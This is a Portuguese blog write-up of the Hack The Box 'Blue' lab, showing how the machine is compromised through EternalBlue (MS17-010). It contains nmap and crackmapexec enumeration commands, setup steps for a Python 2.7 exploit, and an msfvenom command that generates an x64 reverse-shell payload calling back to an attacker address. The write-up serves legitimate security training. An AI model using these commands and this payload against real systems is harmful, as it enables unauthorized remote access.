Blue - HTB Write Up - Eternal Blue Exploit - CVE-2017-0144
Eternal Blue Exploit - CVE-2017-0144
Enumeração Geral
nmap -Pn -sV -O -sC [ip]
nmap -Pn -sV -sC -sU [ip]
nmap -Pn --script vuln -p 445 [ip]
A resposta do scan mostra que o servidor é vulnerável ao Eternal Blue - MS17-010 e com o crackmapexec é possível validar a versão do sistema operacional do servidor:
crackmapexec smb [ip] -u "" -p "" --shares
A vulnerabilidade MS17-010 já tem artigo aqui no blog, conforme esse artigo o repositótio worawit possui o shellcode necessário para executar o ataque.
Alguns pontos sobre os requisitos para explorar o Eternal Blue precisam ser descritos:
[+] O exploit usa a versão python2.7
[+] é necessário criar um ambiente virtual do python na versão 2.7
[+] O pip2.7 precisa ser instalado e para fazer isso é necessário seguir as etapas abaixo:
Download do script para obter o pip2.7
Instalação do pip2.7
python2.7 get-pip.py
[+] O exploit usa o módulo impacket
[+] É necessário instalar o impacket no ambiente virtual do python2.7
!! Error na instalação do impacket para o python2.7
Instale o setuptools com o pip2.7
pip2.7 install --upgrade setuptools
Feito essas etapas, o exploit pode ser executado. O MS17-010 requer uma série de comandos antes da execução e esses comandos estão descritos no artigo anterior AQUI
Attack !!
A diferença entre o exploit mostrado anteriormente e esse ataque é a arquitetura. O servidor Blue tem arquitetura x64 e o shellcode e o payload gerado com o MSVenom foi para x64, conforme o comando abaixo:
msfvenom -p windows/x64/shell_reverse_tcp -f raw -a x64 -o scx64_msf.bin EXITFUNC=thread LHOST=10.10.14.48 LPORT=2525
Execução do exploit
Shell Reversa
Done!!
O acesso ao servidor Blue é concedido com privilégio elevado, finalizando assim o laboratório sem a necessidade da etapa de escalação de privilégio.
Comentários
Postar um comentário